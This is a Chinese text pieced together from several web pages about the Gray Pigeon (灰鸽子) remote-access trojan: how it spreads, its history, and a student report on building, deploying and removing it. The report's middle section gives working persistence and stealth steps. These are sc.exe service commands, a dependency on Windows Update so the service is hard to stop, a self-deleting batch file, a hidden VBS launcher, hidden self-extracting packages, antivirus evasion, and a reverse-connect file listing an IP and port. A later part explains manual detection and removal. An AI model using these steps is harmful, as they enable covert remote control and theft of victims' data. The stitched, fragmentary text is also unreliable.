4.把生成的Server_Setup.exe通过网络共享方式复制至服务端上,并在服务器上双击运行该程序。

灰鸽子木马原理

灰鸽子木马原理

灰鸽子木马原理一、什么是灰鸽子木马灰鸽子木马是一种具有高度隐蔽性和持久性的远程控制软件。

它通常通过钓鱼邮件、恶意下载和网络漏洞利用等方式传播,目的是植入受害者计算机系统,并使黑客能够远程控制和监控计算机。

灰鸽子木马得名于它使用灰鸽子作为其标志性图标。

二、灰鸽子木马的传播方式1.钓鱼邮件:黑客通过发送看似合法和诱人的邮件,含有携带灰鸽子木马的附件或恶意链接。

当受害者打开附件或点击链接时,木马会悄悄地进入系统。

2.恶意下载:黑客会在一些不安全的网站上发布包含恶意代码的软件或文件。

当用户在这些网站上下载并安装软件时,木马就会感染受害者的计算机系统。

3.网络漏洞利用:黑客会利用已知的系统漏洞来传播灰鸽子木马。

他们通过扫描网络,寻找可利用的漏洞,并通过这些漏洞远程感染受害者的计算机。

三、灰鸽子木马的工作原理灰鸽子木马主要包括三个核心部分:客户端程序、服务器端程序和控制面板。

1.客户端程序:客户端程序是指感染了受害者计算机的木马程序。

一旦成功感染,客户端程序便开始在计算机中植入和运行。

它通过窃取敏感信息或监控用户行为来完成黑客的意图。

2.服务器端程序:服务器端程序是黑客控制灰鸽子木马的中央管理系统。

黑客使用服务器端程序来监控和控制感染了客户端程序的计算机。

3.控制面板:控制面板是黑客使用的用户界面,它允许黑客查看和操纵感染了灰鸽子木马的客户端计算机。

通过控制面板,黑客可以发送指令、收集信息和执行各种操作。

灰鸽子木马主要通过以下方式实现远程操控和监控:1.启动自动运行:灰鸽子木马会在感染计算机时添加自启动项,确保在计算机启动时自动运行,以保持持久性。

2.反向连接:客户端程序会与服务器端程序建立一个隐藏的反向连接,使黑客能够远程访问受感染计算机的指令和数据。

3.远程执行命令:黑客可以通过控制面板发送指令给感染了灰鸽子木马的客户端计算机,实现远程执行命令。

4.收集敏感信息:客户端程序可以记录受害者的键盘输入、屏幕截图和网络流量等信息,并将其传输到服务器端程序。

电脑病毒“灰鸽子”

电脑病毒“灰鸽子”

电脑病毒“灰鸽子”推荐文章怎么防止电脑感染灰鸽子木马热度:如何防止电脑感染灰鸽子木马成为肉鸡热度:电脑中了灰鸽子病毒怎么样查杀热度:中了灰鸽子怎么解决热度:灰鸽子病毒的原理和运行方式是怎么样的热度:灰鸽子(Hack. Huigezi)是一个集多种控制方法于一体的木马病毒,用户电脑不幸感染,一举一动就都在黑客的监控之下,窃取账号、密码、照片、重要文件都轻而易举,下面店铺为大家详细的介绍下灰鸽子病毒,希望对你有帮助,谢谢。

灰鸽子病毒:灰鸽子还可以连续捕获远程电脑屏幕,还能监控被控电脑上的摄像头,自动开机并利用摄像头进行录像。

截至2006年底,“灰鸽子”木马已经出现了6万多个变种。

合法情况下使用,它是一款优秀的远程控制软件。

如果做一些非法的事,灰鸽子就成了强大的黑客工具。

灰鸽子客户端和服务端采用Delphi编写。

黑客利用客户端程序配置出服务端程序。

可配置的信息主要包括上线类型、主动连接时使用的公网IP、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。

中文学名灰鸽子自2001年,灰鸽子诞生之日起,就被反病毒专业人士判定为最具危险性的后门程序,并引发了安全领域的高度关注。

2004年、2005年、2006年,灰鸽子木马连续三年被国内各大杀毒厂商评选为年度十大病毒,灰鸽子也因此声名大噪,逐步成为媒体以及网民关注的焦点。

人们在震惊于灰鸽子给广大电脑用户带来的危害的同时,不禁要问,灰鸽子是如何从一个模仿其他病毒开始,发展成为国内极具影响的十大病毒、甚至毒王的呢?[1]灰鸽子自2001年出现至今,主要经历了模仿期、飞速发展期以及全民黑客时代三大阶段。

灰鸽子服务端加壳之后仅有70kb,比葛军的灰鸽子小了近10倍。

国家多线程上线分组。

可视化远程开户。

可以躲过主流管理员的检测方式。

隐蔽性强。

模仿期飞速发展期全民黑客时代2001年-2003年2004年-2005年2006年-2007年模仿期(2001年-2003年)2001年,国内互联网逐步走向普及,网络病毒也伴随着互联网的发展日益取代传统意义上的病毒,而到了2002年,以“电子邮件”、“网络下载和浏览”等方式传播的病毒开始大量涌现,互联网安全成为大众关注的焦点。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

“灰鸽子”攻击原理以及制作和清理院别计算机科学与通信工程学院专业计算机科学与技术班级学号4090511姓名唐盼指导教师曲荣欣成绩2012年 6 月7 日“灰鸽子”攻击原理以及制作和清理一.灰鸽子简介:“灰鸽子”是一种远程控制软件. 最早出现的时候是在模仿前辈“冰河”。

“灰鸽子”在2001年出现的,采用Delphi编写,最早并未以成品方式发布,更多的是以技术研究的姿态,采用了源码共享的方式出现在互联网,导致”灰鸽子”迅速发展起来.并且出现了多种不同的版本. “灰鸽子”在出现的时候使用了当时讨论最多的“反弹端口”连接方式,用以躲避大多数个人网络防火墙的拦截。

由于服务端都以隐藏方式启动,就奠定了其恶意后门木马的地位.而我个人就是高中时候,在”灰鸽子”最盛行和风靡的时候,开始认识”灰鸽子”和关注网络安全这个话题.这也是我最早认识和接触到一种黑客软件.在伴随着”灰鸽子”的盛行发展的同时,自己的对网络互联网安全问题的兴趣也随着同步提高.在有关黑客攻击和防范领域过程中享受这种成就感.但是对于”灰鸽子”的了解大多都是来自于<<电脑报>>,<<电脑爱好者>>这些杂志.没有深入了学习.但是”灰鸽子”这个概念却深入脑海.一直伴随我成长到如今.如今虽然”灰鸽子”已经不再流行,但是这个在我心底有着深刻影响的软件,已然成了一个黑客软件的代名词.二,灰鸽子基本原理:“灰鸽子”客户端和服务端都是采用Delphi编写。

黑客利用客户端程序配置出服务端程序。

可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。

客户端简易便捷的操作使刚入门的初学者都能充当黑客。

当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。

但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。

服务端配置出来的服务端文件文件名为G_Server.exe(这是默认的,当然也可以改变)。

然后黑客利用一切办法诱骗用户运行G_Server.exe程序。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录,2k/NT下为系统盘的Winnt目录,不支持win7系统.在win7做实验没有成功.生成的服务端不能在win7环境下运行).然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。

G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端, G_Server_Hook.dll负责隐藏灰鸽子。

通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。

截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。

所以,有些时候用户感觉中了毒,但仔细检查却又发现不了什么异常。

有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。

注意,G_Server.exe这个名称并不固定,它是可以定制的,比如当定制服务端文件名为A.exe时,生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务(9X系统写注册表启动项),每次开机都能自动运行,运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。

G_Server.dll文件实现后门功能,与控制端客户端进行通信;G_Server_Hook.dll则通过拦截API调用来隐藏病毒。

因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。

随着灰鸽子服务端文件的设置不同,G_Server_Hook.dll有时候附在Explorer.exe的进程空间中,有时候则是附在所有进程中。

三;灰鸽子制作实例步骤:准备工具:灰鸽子服务端; IcoSprite图标更改器;SC.exe服务添加删除更改工具;winrar压缩软件用于捆绑生成的程序.制作过程:1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。

2.用SC创建一个服务运行CMD.EXE 在system32的目录下运行执行SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi".这句是用SC建立一个服务,服务名为huigezi,路径Binpath为"%systemroot%\system32\gezi.exe",类型type为 own 与interact交互,启动类型start为自动,显示名DisplayName为"gezi"。

sc.exe descript_ion huigezi "不死鸽子"这句是将huigezi服务的描改为“不死鸽子” sc config wuauserv depend= huigezi配置huigezi使wuauserv服务依存此服务(wuauserv可以根据自己喜欢改成其它服务,这里的wuauserv是系统在Windows Update网站的自动更新服务)。

这里的目的是迷惑别人,使其不敢轻易停止我们生成的服务。

3.将这些从注册表导出,我们将他命名为1.reg4.创建一个BAT文件,并命名为update.bat@regedit /s %systemroot%\system32\1.reg@%systemroot%\system32\gezi.exe@del /q /f /s %systemroot%\system32\1.reg@del /q /f /s %systemroot%\system32\Update.vbs@del /q /f /s %systemroot%\system32\Update.bat5.创建一个vbs并命名为update.vbs目的是为了作用是令bat里的内容以安静模式执行,这样就可以让cmd 窗口跳出来了,增加了不少隐蔽性.代码如下:On Error Resume Nextset wshshell=createobject ("wscript_.shell")a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)6.用我门配置出来的服务端,并命名为run.exe,用run.exe做一个自解压文件,并命名为gezi.exe.。

将解压模式为全部隐藏.解压后运行run.exe,服务端做免杀7.将gezi.exe , 1.reg, Update.vbs, Update.bat 再用winrar制作一个自解压文件,解压到%systemroot%\system32\ 解压后运行Update.vbs当然解压模式依旧全部隐藏,替换同名文件.客户端控制的准备工作:1, 当然是下载灰鸽子的软件2. 申请一个免费的主页空间,因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。

3. 首先在电脑上新建一个ip.txt的文本文件,内容如下:http://huigezi 111.227.252.212:8000end其中111.227.252.212这个是我的电脑目前的IP地址,8000是连接的端口,然后把这个文件上传到你申请的空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和我取得连接。

然后运行 sunray.exe,在后然后运行 http.exe 点开始服务!最后,运行客户端,也就是H_Client.exe这个文件. 点击“自动上线”选项.四:清理灰鸽子一.灰鸽子的手工检测由于灰鸽子拦截了API调用,在正常模式下服务端程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。

此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。

但是灰鸽子的检测仍然是有规律可循的。

从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。

通过这一点,我们可以较为准确手工检测出灰鸽子服务端。

由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。

进入安全模式的方法是:启动计算机,在系统进入Windows启动画面前,按下F8键(或者在启动计算机时按住Ctrl键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式”。

1、由于灰鸽子的文件本身具有隐藏属性,因此要设置Windows显示所有文件。

打开“我的电脑”,选择菜单“工具”—》“文件夹选项”,点击“查看”,取消“隐藏受保护的操作系统文件”前的对勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”,然后点击“确定”。

2、打开Windows的“搜索文件”,文件名称输入“_hook.dll”,搜索位置选择Windows的安装目录(默认98/xp为C:\windows,2k/NT为C:\Winnt)。

3、经过搜索,我们在Windows目录(不包含子目录)下发现了一个名为Game_Hook.dll的文件。

4、根据灰鸽子原理分析我们知道,如果Game_Hook.DLL是灰鸽子的文件,则在操作系统安装目录下还会有Game.exe和Game.dll文件。

打开Windows目录,果然有这两个文件,同时还有一个用于记录键盘操作的GameKey.dll文件。

经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了,下面就可以进行手动清除。

二、灰鸽子的手工清除经过上面的分析,清除灰鸽子就很容易了。

清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2删除灰鸽子程序文件。

但是为了防止误操作,清除前做好备份。

(一)、清除灰鸽子的服务注意清除灰鸽子的服务一定要在注册表里完成,清除灰鸽子的服务一定要先备份注册表,或者到纯DOS下将注册表文件更名,然后在去注册表删除灰鸽子的服务。

因为病毒会和EXE文件进行关联2000/XP系统:1、打开注册表编辑器(点击“开始”-》“运行”,输入“Regedit.exe”,确定。

),打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。

相关文档
最新文档